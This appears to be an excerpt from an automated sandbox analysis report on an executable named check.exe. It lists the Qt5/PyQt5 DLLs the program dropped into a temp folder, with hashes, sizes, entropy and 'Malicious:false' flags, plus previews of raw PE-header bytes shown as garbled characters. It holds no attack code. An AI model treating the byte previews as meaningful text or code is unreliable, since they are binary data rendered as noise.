                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...5.H.4...(...>.......*.......4.......8.......8......9...<...g....../......=....$.=...<.L.=......=...Rich<...................PE..d...M.._.........." .....(...r......d+..............................................MF....`.........................................0E...^..0................`.. F..................H...T.......................(.......0............@...............................text...N&.......(.................. ..`.rdata.......@.......,..............@..@.data...x/...0...(..................@....pdata.. F...`...H...>..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Quick.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4148720
                                                                                                                                                                                                                                      Entropy (8bit):6.462183686222023
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:EcDwCQsvkBD+ClI3IAVLA7Tr15SokomoqxQhT2bAssCFEUGX5ig:E7CKPsA3p0Z/QV/sS3Ag
                                                                                                                                                                                                                                      MD5:65F59CFC0C1C060CE20D3B9CEFFBAF46
                                                                                                                                                                                                                                      SHA1:CFD56D77506CD8C0671CA559D659DAB39E4AD3C2
                                                                                                                                                                                                                                      SHA-256:C81AD3C1111544064B1830C6F1AEF3C1FD13B401546AB3B852D697C0F4D854B3
                                                                                                                                                                                                                                      SHA-512:D6F6DC19F1A0495026CBA765B5A2414B6AF0DBFC37B5ACEED1CD0AE37B3B0F574B759A176D75B01EDD74C6CE9A3642D3D29A3FD7F166B53A41C8978F562B4B50
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Fvge'.4e'.4e'.4l_.4i'.4.H.5m'.4.H.5a'.4.H.5|'.4.H.5c'.4.W.5o'.4qL.5`'.4e'.4.,.4.W.5.'.4.W.5d'.4.W.4d'.4e'.4d'.4.W.5d'.4Riche'.4........................PE..d......_.........." ......%..B......L.$.......................................?.......?...`.........................................0)2.P.....8.T.....>.......<..^...2?.......?.py......T.......................(.......0............ %..\...........................text.....%.......%................. ..`.rdata....... %.......%.............@..@.data....I...@;..2... ;.............@....pdata...^....<..`...R<.............@..@.rsrc.........>.......>.............@..@.reloc..py....?..z....>.............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Svg.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):330736
                                                                                                                                                                                                                                      Entropy (8bit):6.381828869454302
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:6qLZcTC3wR/0JNZ+csBkBv0L0hq+SvcO8MsvwbIeblsjTR:6qNcCwqHE2fYlsPR
                                                                                                                                                                                                                                      MD5:03761F923E52A7269A6E3A7452F6BE93
                                                                                                                                                                                                                                      SHA1:2CE53C424336BCC8047E10FA79CE9BCE14059C50
                                                                                                                                                                                                                                      SHA-256:7348CFC6444438B8845FB3F59381227325D40CA2187D463E82FC7B8E93E38DB5
                                                                                                                                                                                                                                      SHA-512:DE0FF8EBFFC62AF279E239722E6EEDD0B46BC213E21D0A687572BFB92AE1A1E4219322233224CA8B7211FFEF52D26CB9FE171D175D2390E3B3E6710BBDA010CB
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............_._._..*_._,.^._..^._,.^._,.^._,.^._a.^._._=.._a.^._a.^._a.F_._.._._a.^._Rich._................PE..d......_.........." .........................................................@.......^....`.................................................((....... ...........0...........0..H...xL..T....................N..(....L..0............................................text............................... ..`.rdata..p...........................@..@.data...8...........................@....pdata...0.......2..................@..@.rsrc........ ......................@..@.reloc..H....0......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5WebSockets.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):149488
                                                                                                                                                                                                                                      Entropy (8bit):6.116105454277536
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:4sSkET6pEXb3loojg1Q2sorWvZXF2sorrLA7cG27Qhvvc:4sSd6pwzloDbsnX0sCrc7ct7QVc
                                                                                                                                                                                                                                      MD5:A016545F963548E0F37885E07EF945C7
                                                                                                                                                                                                                                      SHA1:CBE499E53AB0BD2DA21018F4E2092E33560C846F
                                                                                                                                                                                                                                      SHA-256:6B56F77DA6F17880A42D2F9D2EC8B426248F7AB2196A0F55D37ADE39E3878BC6
                                                                                                                                                                                                                                      SHA-512:47A3C965593B97392F8995C7B80394E5368D735D4C77F610AFD61367FFE7658A0E83A0DBD19962C4FA864D94F245A9185A915010AFA23467F999C833982654C2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'`.CF.KCF.KCF.KJ>.KGF.K.).JAF.KW-.JAF.K.).JVF.K.).JKF.K.).J@F.K.6.JFF.KCF.K.G.K.6.JPF.K.6.JBF.K.6.KBF.KCF.KBF.K.6.JBF.KRichCF.K........................PE..d......_.........." .....$..........t(.......................................p.......5....`............................................."..l........P.......0.......,.......`..L...hw..T....................x..(....w..0............@...............................text....".......$.................. ..`.rdata..z....@.......(..............@..@.data...x...........................@....pdata.......0......................@..@.rsrc........P......."..............@..@.reloc..L....`.......(..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Widgets.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5498352
                                                                                                                                                                                                                                      Entropy (8bit):6.619117060971844
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:KO+LIFYAPZtMym9RRQ7/KKIXSewIa/2Xqq1sfeOoKGOh6EwNmiHYYwBrK8KMlH0p:IGoKZdRqJD10rK8KMlH0gi5GX0oKZ
                                                                                                                                                                                                                                      MD5:4CD1F8FDCD617932DB131C3688845EA8
                                                                                                                                                                                                                                      SHA1:B090ED884B07D2D98747141AEFD25590B8B254F9
                                                                                                                                                                                                                                      SHA-256:3788C669D4B645E5A576DE9FC77FCA776BF516D43C89143DC2CA28291BA14358
                                                                                                                                                                                                                                      SHA-512:7D47D2661BF8FAC937F0D168036652B7CFE0D749B571D9773A5446C512C58EE6BB081FEC817181A90F4543EBC2367C7F8881FF7F80908AA48A7F6BB261F1D199
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..................I.......I.......I.......I...........................................9.................................Rich............PE..d....._.........." ......3..P .......3.......................................T......MT...`.........................................0.D.P^....L.h....pS......0P..8....S.......S.d.....?.T...................`.?.(...0.?.0.............3.._...........................text.....3.......3................. ..`.rdata..8.....3.......3.............@..@.data.........O......dO.............@....pdata...8...0P..:....O.............@..@.rsrc........pS......4S.............@..@.reloc..d.....S......:S.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\VCRUNTIME140.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):101872
                                                                                                                                                                                                                                      Entropy (8bit):6.5661918084228725
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:RCKWZGuEK0mOLSTxoPl9GIcuZrxi4hXX9oix8H+NCIecbGShwZul:RFWY1WxgGStJ8H2CIecbG36
                                                                                                                                                                                                                                      MD5:971DBBE854FC6AB78C095607DFAD7B5C
                                                                                                                                                                                                                                      SHA1:1731FB947CD85F9017A95FDA1DC5E3B0F6B42CA2
                                                                                                                                                                                                                                      SHA-256:5E197A086B6A7711BAA09AFE4EA7C68F0E777B2FF33F1DF25A21F375B7D9693A
                                                                                                                                                                                                                                      SHA-512:B966AAB9C0D9459FADA3E5E96998292D6874A7078924EA2C171F0A1A50B0784C24CC408D00852BEC48D6A01E67E41D017684631176D3E90151EC692161F1814D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w.............t:..............................................................Rich....................PE..d.....t^.........." .........^.......................................................e....`A.........................................0..4....9.......p.......P.......L...A..............8........................... ...0............................................text...2........................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\VCRUNTIME140_1.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):44528
                                                                                                                                                                                                                                      Entropy (8bit):6.627837381503075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:Aim/NRETi8kykt25HwviU5fJUiP2551xWmbTqOA7SXf+Ny85xM8ATJWr3KWoC8cS:0Ie8kySL2iPQxdvjAevcMESW5lxJG
                                                                                                                                                                                                                                      MD5:6BC084255A5E9EB8DF2BCD75B4CD0777
                                                                                                                                                                                                                                      SHA1:CF071AD4E512CD934028F005CABE06384A3954B6
                                                                                                                                                                                                                                      SHA-256:1F0F5F2CE671E0F68CF96176721DF0E5E6F527C8CA9CFA98AA875B5A3816D460
                                                                                                                                                                                                                                      SHA-512:B822538494D13BDA947655AF791FED4DAA811F20C4B63A45246C8F3BEFA3EC37FF1AA79246C89174FE35D76FFB636FA228AFA4BDA0BD6D2C41D01228B151FD89
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .S.A...A...A..0.m..A..O....A...9...A...A...A..O....A..O....A..O....A..O....A..O.}..A..O....A..Rich.A..................PE..d.....t^.........." .....:...4......pA...............................................Z....`A.........................................j......|k..x....................l...A......8....b..8...........................@b..0............P..X............................text....9.......:.................. ..`.rdata... ...P..."...>..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..8............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\d3dcompiler_47.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4173928
                                                                                                                                                                                                                                      Entropy (8bit):6.329102290474506
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:8BfmqCtLI4erBYysLjG/A8McPyCD6hw16JVTW7B3EgvVlQ3LAYmyNOvGJse+aWyb:8eZevVKACOvWYQF
                                                                                                                                                                                                                                      MD5:B0AE3AA9DD1EBD60BDF51CB94834CD04
                                                                                                                                                                                                                                      SHA1:EE2F5726AC140FB42D17ABA033D678AFAF8C39C1
                                                                                                                                                                                                                                      SHA-256:E994847E01A6F1E4CBDC5A864616AC262F67EE4F14DB194984661A8D927AB7F4
                                                                                                                                                                                                                                      SHA-512:756EBF4FA49029D4343D1BDB86EA71B2D49E20ADA6370FD7582515455635C73D37AD0DBDEEF456A10AB353A12412BA827CA4D70080743C86C3B42FA0A3152AA3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..(.a.{.a.{.a.{..m{5a.{..l{.a.{.m{.a.{.o{.a.{.a.{.a.{.i{.a.{.l{.a.{.h{.a.{.q{.a.{.k{.a.{.n{.a.{Rich.a.{........................PE..d......R.........." ......;.........`.8......................................@@......a@...`...........................................;.u...P.>.d.....?.@.....=......t?.h<... ?..{..................................@a................>.P............................text.....;.......;................. ..`.data...h.....;.......;.............@....pdata........=......n<.............@..@.idata..@.....>......B>.............@..@.rsrc...@.....?......\>.............@..@.reloc....... ?......b>.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\libEGL.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):25072
                                                                                                                                                                                                                                      Entropy (8bit):5.961464514165753
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
                                                                                                                                                                                                                                      MD5:BB00EF1DD81296AF10FDFA673B4D1397
                                                                                                                                                                                                                                      SHA1:773FFCF4A231B963BAAC36CBEF68079C09B62837
                                                                                                                                                                                                                                      SHA-256:32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
                                                                                                                                                                                                                                      SHA-512:C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...Xv@.Xv@.Xv@. .@.Xv@.7wA.Xv@.3wA.Xv@.7sA.Xv@.7rA.Xv@.7uA.Xv@W(wA.Xv@.Xw@.Xv@W(sA.Xv@W(vA.Xv@W(.@.Xv@.X.@.Xv@W(tA.Xv@Rich.Xv@........PE..d...#._.........." .........0......................................................Z.....`.........................................`9.......B..d.......H....p.......F.......... ....3..T............................4..0............0...............................text............................... ..`.rdata..r#...0...$..................@..@.data........`.......:..............@....pdata.......p.......<..............@..@.rsrc...H............>..............@..@.reloc.. ............D..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\libGLESv2.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):3385328
                                                                                                                                                                                                                                      Entropy (8bit):6.382356347494905
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
                                                                                                                                                                                                                                      MD5:2247EE4356666335DF7D72129AF8D600
                                                                                                                                                                                                                                      SHA1:F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
                                                                                                                                                                                                                                      SHA-256:50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
                                                                                                                                                                                                                                      SHA-512:67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\opengl32sw.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20923392
                                                                                                                                                                                                                                      Entropy (8bit):6.255903817217008
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
                                                                                                                                                                                                                                      MD5:7DBC97BFEE0C7AC89DA8D0C770C977B6
                                                                                                                                                                                                                                      SHA1:A064C8D8967AAA4ADA29BD9FEFBE40405360412C
                                                                                                                                                                                                                                      SHA-256:963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
                                                                                                                                                                                                                                      SHA-512:286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........|.-.....|.+.*...|.*.<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):68080
                                                                                                                                                                                                                                      Entropy (8bit):6.207162014262433
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
                                                                                                                                                                                                                                      MD5:750A31DE7840B5EED8BA14C1BD84D348
                                                                                                                                                                                                                                      SHA1:D345D13B0C303B7094D1C438E49F0046791DE7F6
                                                                                                                                                                                                                                      SHA-256:A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
                                                                                                                                                                                                                                      SHA-512:5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):41968
                                                                                                                                                                                                                                      Entropy (8bit):6.0993566622860635
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
                                                                                                                                                                                                                                      MD5:313F89994F3FEA8F67A48EE13359F4BA
                                                                                                                                                                                                                                      SHA1:8C7D4509A0CAA1164CC9415F44735B885A2F3270
                                                                                                                                                                                                                                      SHA-256:42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
                                                                                                                                                                                                                                      SHA-512:06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:*..i*..i*..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i*..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qgif.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):39408
                                                                                                                                                                                                                                      Entropy (8bit):6.0316011626259405
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
                                                                                                                                                                                                                                      MD5:52FD90E34FE8DED8E197B532BD622EF7
                                                                                                                                                                                                                                      SHA1:834E280E00BAE48A9E509A7DC909BEA3169BDCE2
                                                                                                                                                                                                                                      SHA-256:36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
                                                                                                                                                                                                                                      SHA-512:EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............|..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qicns.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):45040
                                                                                                                                                                                                                                      Entropy (8bit):6.016125225197622
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
                                                                                                                                                                                                                                      MD5:AD84AF4D585643FF94BFA6DE672B3284
                                                                                                                                                                                                                                      SHA1:5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
                                                                                                                                                                                                                                      SHA-256:F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
                                                                                                                                                                                                                                      SHA-512:B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qico.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38384
                                                                                                                                                                                                                                      Entropy (8bit):5.957072398645384
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
                                                                                                                                                                                                                                      MD5:A9ABD4329CA364D4F430EDDCB471BE59
                                                                                                                                                                                                                                      SHA1:C00A629419509929507A05AEBB706562C837E337
                                                                                                                                                                                                                                      SHA-256:1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
                                                                                                                                                                                                                                      SHA-512:004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................

